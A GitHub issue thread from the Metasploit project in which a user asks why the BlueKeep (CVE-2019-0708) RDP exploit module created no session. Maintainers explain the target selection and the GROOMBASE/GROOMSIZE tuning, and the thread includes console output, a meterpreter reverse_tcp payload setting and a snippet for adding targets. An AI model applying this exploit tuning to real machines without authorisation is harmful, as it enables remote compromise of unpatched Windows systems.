CVE-2019-0708 BlueKEEP - Exploit completed, but no session was created #13732

Closed
ar5hil opened this issue Jun 17, 2020 · 6 comments
Labels
question Questions about Metasploit Usage


ar5hil commented Jun 17, 2020

I don't understand what I did wrong.

My Setup

payload => windows/x64/meterpreter/reverse_tcp
target => 1

Current behavior

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 198.168.0.23:4444
[*] 172.20.0.71:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.20.0.71:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.20.0.71:3389 - Scanned 1 of 1 hosts (100% complete)
[*] 172.20.0.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 172.20.0.71:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.20.0.71:3389 - Surfing channels ...
[*] 172.20.0.71:3389 - Lobbing eggs ...
[*] 172.20.0.71:3389 - Forcing the USE of FREE'd object ...
[!] 172.20.0.71:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Exploit completed, but no session was created.

System stuff

Metasploit version

Framework: 5.0.94-dev-1cb57a7e79affb4c4dc48f03a2fd39659bb83bbb
Console : 5.0.94-dev-1cb57a7e79affb4c4dc48f03a2fd39659bb83bbb

I installed Metasploit with:

metasploit-framework.msi
Already installed on Kali

OS

Running on Windows
Also on Kali (Same response)

@bcoles bcoles added the question Questions about Metasploit Usage label Jun 17, 2020
bcoles (Contributor) commented Jun 17, 2020

You will need to set the correct target and may need to set the appropriate groom base and groom size.

The Bluekeep module is also not 100% reliable.

This may also be useful:

https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

ar5hil (Author) commented Jun 22, 2020

How to set groom base and size

bcoles (Contributor) commented Jun 22, 2020

How to set groom base and size

GROOMBASE can be set as a module option:

set GROOMSIZE <size>

The GROOMBASE is hard coded for each target. The following targets are available:

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.5)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)

If a target does not exist for the target system, you will need to add one to the module code. This guide may be useful in adding a target:

Example:

            [
              'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
              {
                'Platform' => 'win',
                'Arch' => [ARCH_X64],
                'GROOMBASE' => 0xfffffa8003800000,
                'GROOMSIZE' => 100
              }
            ],

@justlife4x4

Well, in a machine I tried to exploit, the 250MB groomsize was the default, but the machine kept crashing as I'm on 20-34 MB, so I set the GROOMSIZE to 20MB, but then it says exploit failed.

bcoles (Contributor) commented Jul 25, 2020

The BlueKeep module requires the correct groombase and groomsize. The module contains several targets with the appropriate groombase and groomsize. These targets have been field tested, but the module is not 100% reliable.

Refer to the following guides for information related to configuration and adding new targets:

Closing this issue.

@bcoles bcoles closed this as completed Jul 25, 2020